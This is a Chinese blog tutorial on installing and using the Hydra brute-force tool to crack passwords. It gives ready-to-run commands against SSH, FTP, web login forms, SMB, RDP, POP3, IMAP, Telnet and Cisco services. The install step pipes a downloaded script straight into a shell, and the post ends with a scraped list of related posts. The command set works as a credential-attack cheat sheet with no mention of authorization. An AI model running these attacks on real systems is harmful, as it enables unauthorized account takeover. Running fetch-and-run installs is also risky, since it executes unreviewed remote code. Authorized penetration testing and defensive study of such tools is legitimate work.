环境:centos7.0

hydra,是一个非常好用的暴力破解工具,而且名字也很cool。

下面是官网上的介绍:

AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

下面我们就来尝试使用它来破解ssh的密码:

1.首先安装这个软件

wget -q -O - http://www.atomicorp.com/installers/atomic | shyum install hydra

红帽系的linux下安装十分的非常简单,直接两行代码即可搞定。

windows下可能需要自己编译,下面是这个工具的github地址:

https://github.com/maaaaz/thc-hydra-windows

安装完成之后,使用

hydra -l root -P /home/saijie/桌面/password.txt -t 6 ssh://172.16.xx.xx

命令进行破解,l表示登陆的用户名,P参数后边跟密码字典,-t 表示线程数,最后跟上相应的ip地址即可。

破解的效率和字典有非常大的关系,这里推荐一个字典制作工具-crunch:。

相关的使用方法可以参考:

http://www.cnblogs.com/mitnick/p/6274091.html

下面是爆破其他服务的一些方法,具体如下:

  • 破解ftp:
# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  • get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
  • post方式提交,破解web登录:

  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

  假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

  • 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  • 破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  • 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
  • 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
  • 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
  • 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
  • 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 破解telnet
# hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

参考博文:

http://www.cnblogs.com/mchina/archive/2013/01/01/2840815.htmlhttp://www.cnblogs.com/mitnick/p/6274091.html

hydra暴力破解ssh密码相关推荐

  1. 第八天 02.hydra暴力破解ssh密码以及ftp密码

    hydra暴力破解ssh密码 实验环境: ​ windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...

  2. 使用Medusa美杜莎暴力破解SSH密码

    使用Medusa美杜莎暴力破解SSH密码 1.Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具.可以同时对多个主机,用户或密码执行强力测试.Medusa和hy ...

  3. Freebsd 下用 sshguard 防止暴力破解 ssh 密码

    2019独角兽企业重金招聘Python工程师标准>>> 在 Freebsd 控制台或用 dmesg -a 查看系统消息的时候会发现类似于下面的大量信息,这是因为有人在尝试暴力破解 S ...

  4. hydra笔记-利用hydra暴力破解ssh弱口令

    这里我搭了台虚拟机.ssh开放的22端口.用户名密码都是root. 下载windows版本的hydra GitHub - maaaaz/thc-hydra-windows at v9.1 解压就可以了 ...

  5. DenyHosts教程:防暴力破解SSH密码

    背景 此前服务器多次被恶意挖矿,我们通过下面的命令搜索SSH远程登录日志,发现攻击者的IP尝试登录了200多次,即暴力破解了被攻击用户的密码.通过询问该用户得知,设置的密码确实比较简单,为了防止后面被 ...

  6. 使用Hydra批量暴力破解SSH、RDP登录口令

    破解环境:Kali 2021.1 使用namp扫描SSH端口开放的主机 nmap -p 22 -n --open 192.168.1.0/24 | grep 192 |awk '{print $5}' ...

  7. Hydra暴力破解神器使用教程

    Hydra hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,不过常用于破解各种协议的密码 支持的协议 支持在线破解的服务协议: adam ...

  8. 20220208--CTF MISC-- BUUCTF--二维码 1--binwalk-john-(工具的使用:分析文件/暴力破解压缩包密码)

    MISC-- BUUCTF–二维码 1 这题首先下载文件,解压: 微信扫描了一下这个二维码,得到: secret is here 打开kali ,首先用binwalk分析该文件 命令: binkwal ...

  9. 如何在Windows平台用Java代码暴力破解WIFI密码

    开始进入正题.在网上找了很多wifi破解工具,都是linux平台下用的,然后还不支持虚拟机装linux.因为很多笔记本装虚拟机都识别不了内置网卡.所以得把系统刻到U盘,然后用U盘启动.但是我现在穷得连 ...

最新文章

  1. 如何采用简化方法进行需求分析
  2. 中科大“重金”招博士,保底年收入10万,却只面向5校本科生
  3. android开发之shape详解
  4. from server sql 拼接统计两个子查询_[SQL SERVER系列]之嵌套子查询和相关子查询
  5. Grow heap (frag case) to 6.437MB for 1114126-byte allocation
  6. mysql+imx6+移植_imx6ulevk---MfgTool的使用心得
  7. python动画精灵_【python游戏编程之旅】第六篇---pygame中的Sprite(精灵)模块和加载动画...
  8. Unity Shaders and Effects Cookbook (3-4) 使用高光贴图
  9. 纠结也好,蛋疼也罢,既然创业了,就把路走好。
  10. 好好活着就是一场博弈
  11. 如何准备 Java 初级和高级的技术面试
  12. libpng error处理方式
  13. html文件超链接打不开,Excel中出现超链接打不开的解决方法
  14. WindowsCMD配置代理
  15. 2017杭州云栖大会精华PPT
  16. 最新雷速问卷调查系统V7.15+ASP内核开发
  17. 文件管理器和FTP客户端:ForkLift for Mac
  18. 京东书籍信息及评论内容爬取
  19. 微信公众号开发整理(五)--自定义菜单
  20. 行云管家V4.9正式发布:监控全面提升,首页、主机详情大幅优化,新增大量实用功能.md...

热门文章

  1. 机电一体化与计算机系,电力系统自动化与机电一体化专业介绍
  2. eclipse html乱码
  3. 雨林木风 迅雷 两者比较
  4. 【菜鸟教程】Zookeeper基础入门(使用curator)【下】
  5. PTCMS安装搭建教程小说源码安装教程及自动采集
  6. Python之Django框架(一)
  7. [安卓]解决因为冻结了系统程序导致不能开机的问题
  8. 初学者Cocos(TypeScritp)简单实现2048游戏
  9. 某战友H3CTE之旅
  10. streamsets 链接mysql_StreamSets:MySQL Binary Log